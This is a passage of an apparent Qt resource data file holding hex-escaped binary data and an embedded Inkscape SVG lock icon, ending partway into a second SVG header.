\x0c\xc1\x0d\x2d\xf2\x98\xac\xb8\x52\xe9\x5f\x5d\x64\xcf\x2d\x27\
\xb1\xe9\x71\xd2\x61\xb2\xb8\x74\x70\x69\x48\x0d\x43\xb2\x18\x5d\
\xc2\xfb\xe0\x31\x58\xe8\x98\x66\x46\x83\xec\x0b\x2a\x65\xac\xd0\
\x58\x10\x67\x2a\x23\xf5\x22\x6f\xf4\x0d\x8b\xd0\x7e\x00\xaf\x6e\
\x24\xaf\xc4\xd1\x4c\x4a\x71\xd8\x5f\x5a\xfa\x35\x3c\xee\xf5\x03\
\xec\x31\x35\x49\xc9\x30\x36\x2d\x26\x61\xef\x89\x83\x27\xad\x20\
\x9b\xd2\x34\x30\xf4\x17\xa3\x03\xae\xc2\x54\xd1\x44\x0b\x1d\x82\
\x3d\xb3\x1a\x84\x53\x7e\xb4\xd7\x87\x1c\x65\x74\x51\x7f\x88\xe0\
\xbd\x0f\x99\xcb\x0c\x99\xda\x13\x3e\x17\x0e\xaf\x72\x11\x30\xf4\
\xf8\xb8\x07\xae\xaa\x85\xa7\x55\x54\x00\x17\x86\x4a\xaa\xfd\x69\
\xf9\x42\xfb\x9b\x09\x47\x33\xb2\x90\xee\x42\x34\x7a\x72\x17\x46\
\x2c\x17\xfa\x1c\x7d\x79\x29\x47\xd8\xbb\x71\x84\x29\x05\x48\xe5\
\xc4\x9b\x50\x78\x0b\x28\x0c\x01\xcb\x4d\x32\xd0\x8f\x7a\xd8\x07\
\xa8\xe4\x67\x20\xbc\x95\xc7\x8f\x72\x85\xc0\x0c\xce\x90\xcf\x49\
\x38\x43\x60\x06\x4d\x18\xc9\xd5\x0d\x04\x06\x97\x80\xc0\x52\x53\
\x03\xf0\x93\x6c\xe2\x50\xd5\x1d\x16\x85\xf3\x45\xe7\xf8\xab\x1c\
\x79\x7e\xf0\x72\x0a\x17\x4c\x85\x1b\xee\x3a\xcf\x5d\x4b\x08\x25\
\xff\x8b\x6b\xc9\x6c\x47\xfe\x3f\xee\x27\x36\xf9\xca\x0d\xa5\x44\
\xb2\x77\x43\x02\xdd\xb7\xa0\x3e\xe6\x24\xe2\xcf\xd0\x1b\xd3\xf4\
\x66\xca\x46\xd6\x30\xc8\xcd\xd3\xdc\x16\x4c\x24\xc6\x4d\x7e\x32\
\x84\xa3\x2b\x3e\xe3\xb5\x70\x22\xb6\x99\x70\x32\xd3\xac\x36\x91\
\x9a\x1f\x4e\x0c\x86\xe6\x26\xbd\xec\x39\x52\xe3\x26\xa9\xf1\x9e\
\xd4\xd8\x4c\x32\x12\x87\xc1\x67\x7c\x4e\x67\x1c\xcd\xd5\x47\x99\
\xa6\xcd\x9b\x64\xc6\x0d\x2e\xeb\xe9\x61\x22\xac\x6b\x24\x66\x70\
\x18\x7b\x86\xbe\x02\x4d\x5f\x73\xd9\x48\xc8\x3d\x79\x85\x9a\xb8\
\xdc\x69\x76\xc6\x3f\x33\xe1\x15\xda\xe2\x23\x6d\xf1\xb9\x6c\x30\
\x3a\x27\x2d\x6f\xa1\x43\x38\xd7\x7e\x41\xc8\x17\xdd\xa0\x2c\x1f\
\x98\xc2\xe5\x6e\x10\xc9\x73\xe9\x47\x9c\x6b\xce\x0a\x28\x30\x89\
\xec\xe4\x50\xde\xe3\x23\x38\x14\x3e\xe1\x84\x02\x8f\x44\x38\x08\
\x89\x1b\xc8\xef\x06\x0e\x9d\x12\x81\x78\x6c\xf6\x60\x2a\x95\xaa\
\xb8\xaa\xa2\xaa\x85\x6a\x01\x8a\x03\x75\x8a\xa4\x82\xcf\x55\x2d\
\x35\x59\xa9\xd5\x3c\x37\x82\x68\xe4\x37\x0b\xb0\xa4\x2b\x71\xe2\
\x9d\x8e\xf1\xc5\x7c\x2c\xc0\xe7\xde\x8d\x9b\x86\x8b\x03\x4e\xb8\
\xcf\x2f\xe1\x94\x6b\x34\xf5\x2e\xc1\xd4\xbb\x81\xa5\xfc\x0a\x94\
\x7a\xd7\x90\xd4\x04\xd2\x2b\x30\xfa\x35\x10\xe5\x97\x10\x7a\x1b\
\x40\x4d\xfc\xbc\x80\xcf\x6f\x43\xcf\x4b\xf0\x34\x3e\x04\xf8\x1c\
\x3a\xf9\xb7\x20\x27\xbf\x01\x9c\x9e\xc6\x4d\x7e\x09\x9b\xfc\xab\
\xa8\x79\x05\x34\xf9\x35\xcc\x34\x21\xf3\x0a\x62\x3e\x0f\x98\x97\
\x78\xf9\xf2\xe0\xd2\x77\xcf\x2f\x8a\xea\xcf\x52\xfe\xcf\xf2\xe1\
\xee\xdf\xfd\xc3\x1d\x1c\
\x00\x00\x0d\x5e\
\x3c\
\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\
\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\
\x2d\x38\x22\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d\x22\
\x6e\x6f\x22\x3f\x3e\x0a\x3c\x21\x2d\x2d\x20\x43\x72\x65\x61\x74\
\x65\x64\x20\x77\x69\x74\x68\x20\x49\x6e\x6b\x73\x63\x61\x70\x65\
\x20\x28\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x29\x20\x2d\x2d\x3e\x0a\
\x0a\x3c\x73\x76\x67\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x64\
\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\
\x72\x67\x2f\x64\x63\x2f\x65\x6c\x65\x6d\x65\x6e\x74\x73\x2f\x31\
\x2e\x31\x2f\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x63\x63\
\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x63\x72\x65\x61\x74\x69\x76\
\x65\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x6f\x72\x67\x2f\x6e\x73\x23\
\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x72\x64\x66\x3d\x22\
\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\
\x67\x2f\x31\x39\x39\x39\x2f\x30\x32\x2f\x32\x32\x2d\x72\x64\x66\
\x2d\x73\x79\x6e\x74\x61\x78\x2d\x6e\x73\x23\x22\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x73\x76\x67\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3d\
\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\
\x72\x67\x2f\x32\x30\x30\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x73\x6f\x64\x69\x70\x6f\x64\x69\x3d\x22\
\x68\x74\x74\x70\x3a\x2f\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2e\
\x73\x6f\x75\x72\x63\x65\x66\x6f\x72\x67\x65\x2e\x6e\x65\x74\x2f\
\x44\x54\x44\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2d\x30\x2e\x64\
\x74\x64\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\
\x77\x2e\x69\x6e\x6b\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x6e\
\x61\x6d\x65\x73\x70\x61\x63\x65\x73\x2f\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x22\x0a\x20\x20\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x36\
\x70\x78\x22\x0a\x20\x20\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\
\x36\x70\x78\x22\x0a\x20\x20\x20\x76\x69\x65\x77\x42\x6f\x78\x3d\
\x22\x30\x20\x30\x20\x31\x36\x20\x31\x36\x22\x0a\x20\x20\x20\x76\
\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x31\x22\x0a\x20\x20\x20\
\x69\x64\x3d\x22\x53\x56\x47\x52\x6f\x6f\x74\x22\x0a\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x76\x65\x72\x73\x69\x6f\x6e\
\x3d\x22\x30\x2e\x39\x32\x2e\x31\x20\x72\x22\x0a\x20\x20\x20\x73\
\x6f\x64\x69\x70\x6f\x64\x69\x3a\x64\x6f\x63\x6e\x61\x6d\x65\x3d\
\x22\x6c\x6f\x63\x6b\x2e\x73\x76\x67\x22\x3e\x0a\x20\x20\x3c\x73\
\x6f\x64\x69\x70\x6f\x64\x69\x3a\x6e\x61\x6d\x65\x64\x76\x69\x65\
\x77\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x62\x61\x73\x65\x22\
\x0a\x20\x20\x20\x20\x20\x70\x61\x67\x65\x63\x6f\x6c\x6f\x72\x3d\
\x22\x23\x66\x66\x66\x66\x66\x66\x22\x0a\x20\x20\x20\x20\x20\x62\
\x6f\x72\x64\x65\x72\x63\x6f\x6c\x6f\x72\x3d\x22\x23\x36\x36\x36\
\x36\x36\x36\x22\x0a\x20\x20\x20\x20\x20\x62\x6f\x72\x64\x65\x72\
\x6f\x70\x61\x63\x69\x74\x79\x3d\x22\x31\x2e\x30\x22\x0a\x20\x20\
\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x70\x61\x67\x65\
\x6f\x70\x61\x63\x69\x74\x79\x3d\x22\x30\x2e\x30\x22\x0a\x20\x20\
\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x70\x61\x67\x65\
\x73\x68\x61\x64\x6f\x77\x3d\x22\x32\x22\x0a\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x7a\x6f\x6f\x6d\x3d\x22\x33\
\x32\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\
\x3a\x63\x78\x3d\x22\x32\x2e\x34\x33\x38\x35\x38\x34\x22\x0a\x20\
\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x79\x3d\
\x22\x38\x2e\x34\x36\x32\x32\x30\x35\x39\x22\x0a\x20\x20\x20\x20\
\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x64\x6f\x63\x75\x6d\x65\
\x6e\x74\x2d\x75\x6e\x69\x74\x73\x3d\x22\x70\x78\x22\x0a\x20\x20\
\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x75\x72\x72\
\x65\x6e\x74\x2d\x6c\x61\x79\x65\x72\x3d\x22\x6c\x61\x79\x65\x72\
\x31\x22\x0a\x20\x20\x20\x20\x20\x73\x68\x6f\x77\x67\x72\x69\x64\
\x3d\x22\x66\x61\x6c\x73\x65\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\
\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x77\x69\
\x64\x74\x68\x3d\x22\x31\x34\x34\x30\x22\x0a\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\
\x68\x65\x69\x67\x68\x74\x3d\x22\x38\x34\x34\x22\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\
\x77\x2d\x78\x3d\x22\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x79\x3d\x22\
\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\
\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x6d\x61\x78\x69\x6d\x69\x7a\x65\
\x64\x3d\x22\x31\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\
\x61\x70\x65\x3a\x67\x72\x69\x64\x2d\x62\x62\x6f\x78\x3d\x22\x74\
\x72\x75\x65\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x64\x65\x66\x73\x0a\
\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x64\x65\x66\x73\x31\x30\x22\
\x20\x2f\x3e\x0a\x20\x20\x3c\x6d\x65\x74\x61\x64\x61\x74\x61\x0a\
\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x6d\x65\x74\x61\x64\x61\x74\
\x61\x31\x33\x22\x3e\x0a\x20\x20\x20\x20\x3c\x72\x64\x66\x3a\x52\
\x44\x46\x3e\x0a\x20\x20\x20\x20\x20\x20\x3c\x63\x63\x3a\x57\x6f\
\x72\x6b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x66\x3a\
\x61\x62\x6f\x75\x74\x3d\x22\x22\x3e\x0a\x20\x20\x20\x20\x20\x20\
\x20\x20\x3c\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\x3e\x69\x6d\x61\
\x67\x65\x2f\x73\x76\x67\x2b\x78\x6d\x6c\x3c\x2f\x64\x63\x3a\x66\
\x6f\x72\x6d\x61\x74\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\
\x64\x63\x3a\x74\x79\x70\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x20\
\x20\x20\x20\x72\x64\x66\x3a\x72\x65\x73\x6f\x75\x72\x63\x65\x3d\
\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\x72\x67\
\x2f\x64\x63\x2f\x64\x63\x6d\x69\x74\x79\x70\x65\x2f\x53\x74\x69\
\x6c\x6c\x49\x6d\x61\x67\x65\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\
\x20\x20\x20\x20\x3c\x64\x63\x3a\x74\x69\x74\x6c\x65\x20\x2f\x3e\
\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x63\x63\x3a\x57\x6f\x72\x6b\
\x3e\x0a\x20\x20\x20\x20\x3c\x2f\x72\x64\x66\x3a\x52\x44\x46\x3e\
\x0a\x20\x20\x3c\x2f\x6d\x65\x74\x61\x64\x61\x74\x61\x3e\x0a\x20\
\x20\x3c\x67\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\
\x65\x3a\x67\x72\x6f\x75\x70\x6d\x6f\x64\x65\x3d\x22\x6c\x61\x79\
\x65\x72\x22\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x6c\x61\x79\
\x65\x72\x33\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x3a\x6c\x61\x62\x65\x6c\x3d\x22\x45\x62\x65\x6e\x65\x20\
\x33\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x67\x0a\x20\x20\x20\x20\x20\
\x69\x64\x3d\x22\x6c\x61\x79\x65\x72\x31\x22\x0a\x20\x20\x20\x20\
\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x67\x72\x6f\x75\x70\x6d\
\x6f\x64\x65\x3d\x22\x6c\x61\x79\x65\x72\x22\x0a\x20\x20\x20\x20\
\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x6c\x61\x62\x65\x6c\x3d\
\x22\x45\x62\x65\x6e\x65\x20\x31\x22\x3e\x0a\x20\x20\x20\x20\x3c\
\x72\x65\x63\x74\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\
\x65\x3d\x22\x66\x69\x6c\x6c\x3a\x23\x30\x30\x35\x35\x64\x34\x3b\
\x66\x69\x6c\x6c\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x3b\x73\
\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\x3a\x31\x2e\x32\x39\
\x35\x35\x32\x35\x30\x37\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x69\
\x64\x3d\x22\x72\x65\x63\x74\x32\x36\x22\x0a\x20\x20\x20\x20\x20\
\x20\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x33\x2e\x31\x38\x37\x35\
\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x68\x65\x69\x67\x68\x74\x3d\
\x22\x39\x2e\x34\x31\x30\x39\x36\x32\x31\x22\x0a\x20\x20\x20\x20\
\x20\x20\x20\x78\x3d\x22\x31\x2e\x35\x33\x31\x32\x35\x22\x0a\x20\
\x20\x20\x20\x20\x20\x20\x79\x3d\x22\x36\x2e\x31\x38\x32\x37\x38\
\x37\x39\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x72\x79\x3d\x22\x31\
\x2e\x36\x36\x38\x39\x33\x39\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\
\x3c\x70\x61\x74\x68\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\
\x6c\x65\x3d\x22\x66\x69\x6c\x6c\x3a\x6e\x6f\x6e\x65\x3b\x66\x69\
\x6c\x6c\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x3b\x73\x74\x72\
\x6f\x6b\x65\x3a\x23\x30\x30\x35\x35\x64\x34\x3b\x73\x74\x72\x6f\
\x6b\x65\x2d\x77\x69\x64\x74\x68\x3a\x32\x2e\x33\x37\x38\x39\x39\
\x39\x39\x35\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6d\x69\x74\x65\x72\
\x6c\x69\x6d\x69\x74\x3a\x34\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x64\
\x61\x73\x68\x61\x72\x72\x61\x79\x3a\x6e\x6f\x6e\x65\x3b\x73\x74\
\x72\x6f\x6b\x65\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x22\x0a\
\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x70\x61\x74\x68\x39\
\x35\x35\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x6f\x64\x69\x70\
\x6f\x64\x69\x3a\x74\x79\x70\x65\x3d\x22\x61\x72\x63\x22\x0a\x20\
\x20\x20\x20\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x63\
\x78\x3d\x22\x38\x2e\x30\x39\x34\x36\x31\x30\x32\x22\x0a\x20\x20\
\x20\x20\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x63\x79\
\x3d\x22\x34\x2e\x39\x32\x34\x30\x31\x34\x31\x22\x0a\x20\x20\x20\
\x20\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x72\x78\x3d\
\x22\x34\x2e\x30\x37\x31\x38\x34\x32\x32\x22\x0a\x20\x20\x20\x20\
\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x72\x79\x3d\x22\
\x33\x2e\x31\x31\x34\x36\x30\x38\x38\x22\x0a\x20\x20\x20\x20\x20\
\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x73\x74\x61\x72\x74\
\x3d\x22\x33\x2e\x31\x33\x33\x34\x36\x30\x35\x22\x0a\x20\x20\x20\
\x20\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x65\x6e\x64\
\x3d\x22\x33\x2e\x31\x33\x32\x38\x32\x33\x31\x22\x0a\x20\x20\x20\
\x20\x20\x20\x20\x64\x3d\x22\x4d\x20\x34\x2e\x30\x32\x32\x39\x30\
\x32\x37\x2c\x34\x2e\x39\x34\x39\x33\x34\x32\x33\x20\x41\x20\x34\
\x2e\x30\x37\x31\x38\x34\x32\x32\x2c\x33\x2e\x31\x31\x34\x36\x30\
\x38\x38\x20\x30\x20\x30\x20\x31\x20\x38\x2e\x30\x36\x30\x38\x34\
\x38\x39\x2c\x31\x2e\x38\x30\x39\x35\x31\x32\x34\x20\x34\x2e\x30\
\x37\x31\x38\x34\x32\x32\x2c\x33\x2e\x31\x31\x34\x36\x30\x38\x38\
\x20\x30\x20\x30\x20\x31\x20\x31\x32\x2e\x31\x36\x36\x33\x30\x37\
\x2c\x34\x2e\x38\x39\x37\x36\x39\x33\x33\x20\x34\x2e\x30\x37\x31\
\x38\x34\x32\x32\x2c\x33\x2e\x31\x31\x34\x36\x30\x38\x38\x20\x30\
\x20\x30\x20\x31\x20\x38\x2e\x31\x32\x39\x36\x36\x39\x32\x2c\x38\
\x2e\x30\x33\x38\x35\x30\x37\x34\x20\x34\x2e\x30\x37\x31\x38\x34\
\x32\x32\x2c\x33\x2e\x31\x31\x34\x36\x30\x38\x38\x20\x30\x20\x30\
\x20\x31\x20\x34\x2e\x30\x32\x32\x39\x32\x34\x36\x2c\x34\x2e\x39\
\x35\x31\x33\x32\x37\x35\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x73\
\x6f\x64\x69\x70\x6f\x64\x69\x3a\x6f\x70\x65\x6e\x3d\x22\x74\x72\
\x75\x65\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x2f\x67\x3e\x0a\x20\x20\
\x3c\x67\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\
\x3a\x67\x72\x6f\x75\x70\x6d\x6f\x64\x65\x3d\x22\x6c\x61\x79\x65\
\x72\x22\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x6c\x61\x79\x65\
\x72\x32\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\
\x65\x3a\x6c\x61\x62\x65\x6c\x3d\x22\x45\x62\x65\x6e\x65\x20\x32\
\x22\x3e\x0a\x20\x20\x20\x20\x3c\x70\x61\x74\x68\x0a\x20\x20\x20\
\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\x6c\x6c\x3a\
\x23\x66\x66\x66\x66\x66\x66\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\x61\
\x63\x69\x74\x79\x3a\x31\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x6e\x6f\
\x6e\x65\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\x3a\
\x31\x2e\x35\x30\x34\x32\x37\x37\x31\x31\x3b\x73\x74\x72\x6f\x6b\
\x65\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x22\x0a\x20\x20\x20\
\x20\x20\x20\x20\x69\x64\x3d\x22\x70\x61\x74\x68\x38\x35\x33\x22\
\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\x69\
\x3a\x74\x79\x70\x65\x3d\x22\x61\x72\x63\x22\x0a\x20\x20\x20\x20\
\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x63\x78\x3d\x22\
\x38\x2e\x30\x37\x34\x32\x39\x31\x32\x22\x0a\x20\x20\x20\x20\x20\
\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x63\x79\x3d\x22\x38\
\x2e\x38\x34\x33\x35\x38\x32\x32\x22\x0a\x20\x20\x20\x20\x20\x20\
\x20\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x72\x78\x3d\x22\x31\x2e\
\x38\x31\x35\x38\x36\x37\x39\x22\x0a\x20\x20\x20\x20\x20\x20\x20\
\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x72\x79\x3d\x22\x31\x2e\x37\
\x31\x35\x38\x39\x33\x39\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x73\
\x6f\x64\x69\x70\x6f\x64\x69\x3a\x73\x74\x61\x72\x74\x3d\x22\x33\
\x2e\x31\x34\x31\x35\x39\x32\x37\x22\x0a\x20\x20\x20\x20\x20\x20\
\x20\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x65\x6e\x64\x3d\x22\x32\
\x2e\x38\x32\x30\x34\x36\x30\x33\x22\x0a\x20\x20\x20\x20\x20\x20\
\x20\x64\x3d\x22\x4d\x20\x36\x2e\x32\x35\x38\x34\x32\x33\x33\x2c\
\x38\x2e\x38\x34\x33\x35\x38\x32\x31\x20\x41\x20\x31\x2e\x38\x31\
\x35\x38\x36\x37\x39\x2c\x31\x2e\x37\x31\x35\x38\x39\x33\x39\x20\
\x30\x20\x30\x20\x31\x20\x37\x2e\x39\x32\x38\x36\x36\x34\x34\x2c\
\x37\x2e\x31\x33\x33\x32\x31\x35\x31\x20\x31\x2e\x38\x31\x35\x38\
\x36\x37\x39\x2c\x31\x2e\x37\x31\x35\x38\x39\x33\x39\x20\x30\x20\
\x30\x20\x31\x20\x39\x2e\x38\x36\x36\x38\x30\x31\x35\x2c\x38\x2e\
\x35\x36\x39\x32\x35\x20\x31\x2e\x38\x31\x35\x38\x36\x37\x39\x2c\
\x31\x2e\x37\x31\x35\x38\x39\x33\x39\x20\x30\x20\x30\x20\x31\x20\
\x38\x2e\x35\x30\x37\x34\x32\x35\x36\x2c\x31\x30\x2e\x35\x30\x39\
\x39\x34\x38\x20\x31\x2e\x38\x31\x35\x38\x36\x37\x39\x2c\x31\x2e\
\x37\x31\x35\x38\x39\x33\x39\x20\x30\x20\x30\x20\x31\x20\x36\x2e\
\x33\x35\x31\x32\x35\x33\x2c\x39\x2e\x33\x38\x35\x31\x38\x39\x22\
\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\x69\
\x3a\x6f\x70\x65\x6e\x3d\x22\x74\x72\x75\x65\x22\x20\x2f\x3e\x0a\
\x20\x20\x20\x20\x3c\x72\x65\x63\x74\x0a\x20\x20\x20\x20\x20\x20\
\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\x6c\x6c\x3a\x23\x66\x66\
\x66\x66\x66\x66\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\x61\x63\x69\x74\
\x79\x3a\x31\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x6e\x6f\x6e\x65\x3b\
\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\x3a\x30\x2e\x37\
\x39\x33\x36\x35\x33\x37\x33\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6f\
\x70\x61\x63\x69\x74\x79\x3a\x31\x22\x0a\x20\x20\x20\x20\x20\x20\
\x20\x69\x64\x3d\x22\x72\x65\x63\x74\x31\x36\x38\x35\x22\x0a\x20\
\x20\x20\x20\x20\x20\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x2e\x32\
\x34\x38\x38\x33\x35\x34\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x68\
\x65\x69\x67\x68\x74\x3d\x22\x34\x2e\x30\x38\x34\x32\x31\x34\x32\
\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x78\x3d\x22\x37\x2e\x34\x39\
\x31\x34\x36\x32\x32\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x79\x3d\
\x22\x31\x30\x2e\x33\x34\x34\x30\x30\x36\x22\x20\x2f\x3e\x0a\x20\
\x20\x3c\x2f\x67\x3e\x0a\x3c\x2f\x73\x76\x67\x3e\x0a\
\x00\x00\x0a\xe9\
\x3c\
\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\
\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\
\x2d\x38\x22\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d\x22\
\x6e\x6f\x22\x3f\x3e\x0a\x3c\x21\x2d\x2d\x20\x43\x72\x65\x61\x74\
\x65\x64\x20\x77\x69\x74\x68\x20\x49\x6e\x6b\x73\x63\x61\x70\x65\
\x20\x28\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x29\x20\x2d\x2d\x3e\x0a\
\x0a\x3c\x73\x76\x67\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x64\
\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\
\x72\x67\x2f\x64\x63\x2f\x65\x6c\x65\x6d\x65\x6e\x74\x73\x2f\x31\
\x2e\x31\x2f\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x63\x63\
\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x63\x72\x65\x61\x74\x69\x76\
\x65\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x6f\x72\x67\x2f\x6e\x73\x23\
\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x72\x64\x66\x3d\x22\
\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\
\x67\x2f\x31\x39\x39\x39\x2f\x30\x32\x2f\x32\x32\x2d\x72\x64\x66\
\x2d\x73\x79\x6e\x74\x61\x78\x2d\x6e\x73\x23\x22\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x73\x76\x67\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
